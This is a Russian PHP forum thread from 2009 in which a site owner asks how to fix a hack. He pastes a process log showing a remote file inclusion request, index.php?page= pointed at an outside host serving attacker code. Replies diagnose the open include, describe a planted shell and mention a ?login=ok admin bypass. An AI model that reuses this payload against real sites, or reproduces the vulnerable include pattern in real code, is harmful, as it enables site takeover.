За последние 24 часа нас посетили 16065 программистов и 1541 робот. Сейчас ищут 873 программиста ...

Сайт взломали, как устранить уязвимость

Тема в разделе "Прочие вопросы по PHP", создана пользователем battrack, 17 фев 2009.

  1. battrack

    battrack Активный пользователь

    С нами с:
    17 фев 2009
    Сообщения:
    16
    Симпатии:
    0
    Вопрос такой. У меня на хостинге peterhost.ru размещен свой сайт (портфолио). Недавно он перестал работать. Я обратился в службу техподдержки и мне сказали, что сайт был взломан, вся информация о взломе в файле hack.log (ниже приведу его листинг). Велели устранить уязвимость и дать знать им. Я, если честно, даже и не представляю где там может быть уязвимость.

    Текст файла:

    batmast 4889 0.0 0.5 800904 43752 ?? IV 2:32AM 0:00.23 httpd: batmast - www.batmaster.ru - GET /index.php?page=http://asaf.in/phpb.txt? HTTP/1.0 (
    batmast 52916 0.0 0.0 777516 2012 ?? IV Sun05PM 0:00.13 httpd: batmast - www.batmaster.ru - GET /index.php?page=http://asaf.in/phpb.txt? HTTP/1.0 (
    batmast 64710 0.0 0.0 0 0 ?? Z Sun06PM 0:00.08 <defunct>
    batmast 64715 0.0 0.0 23732 1124 ?? I Sun06PM 0:00.59 httpds (perl5.8.8)

    (batmast - это мой логин)

    Все адреса у меня имеют формат типа такого batmaster.ru/index.php?page=main (т.е. например страница main).

    Подскажите, что делать
     
  2. armadillo

    armadillo Активный пользователь

    С нами с:
    6 апр 2007
    Сообщения:
    2.380
    Симпатии:
    0
    Адрес:
    Russia, Moscow
    дырок у тебя наверняка море.
    то что видно:
    ты позволяешь в свой скрипт добавлять чужие.
    хостинг тоже конечно хорош, открыты инклуды наружу.
     
  3. [vs]

    [vs] Суперстар
    Команда форума Модератор

    С нами с:
    27 сен 2007
    Сообщения:
    10.559
    Симпатии:
    632
    Покажи index.php
     
  4. admyx

    admyx Активный пользователь

    С нами с:
    14 мар 2008
    Сообщения:
    2.159
    Симпатии:
    1
    Залили шелл и убили все, что захотелось.....
    Листинг index.php в студию!
     
  5. Kreker

    Kreker Старожил

    С нами с:
    8 апр 2007
    Сообщения:
    5.433
    Симпатии:
    0
    У Вас же на сайте написано, что Вы - веб-разработчик, знаете PHP =\
    Это Вы сделали столько сайтов, оставив во всех такие дырки?
     
  6. Mr.M.I.T.

    Mr.M.I.T. Старожил

    С нами с:
    28 янв 2008
    Сообщения:
    4.586
    Симпатии:
    1
    Адрес:
    у тебя канфетка?
    я всё пытаюсь решить что хуже, наши IT вузы или Попов
     
  7. Hight

    Hight Старожил
    Команда форума Модератор

    С нами с:
    5 мар 2006
    Сообщения:
    7.153
    Симпатии:
    0
    Адрес:
    из злой параллельной вселенной
    Всё говно.
     
  8. Kreker

    Kreker Старожил

    С нами с:
    8 апр 2007
    Сообщения:
    5.433
    Симпатии:
    0
    Вообще, что-то на рекламу смахивает.
    Да и не верю я, что сделав столько сайтов, можно так лохануться, да и еще не понимать таких вещей.
     
  9. [vs]

    [vs] Суперстар
    Команда форума Модератор

    С нами с:
    27 сен 2007
    Сообщения:
    10.559
    Симпатии:
    632
    Сам видел один быдло чудо-движок, на котором работает не менее одного достаточно серьёзного сайта (типа фирмы-торговца автомобилями), для входа в админ-панель которого достаточно в строке адреса дописать нечто типа ?login=ok :-D
     
  10. Mr.M.I.T.

    Mr.M.I.T. Старожил

    С нами с:
    28 янв 2008
    Сообщения:
    4.586
    Симпатии:
    1
    Адрес:
    у тебя канфетка?
    Kreker
    кому такая реклама нужна? ;)
    на сайтах в портфеле такая же фигня, а он sql инекций походу спасают только магические кавычки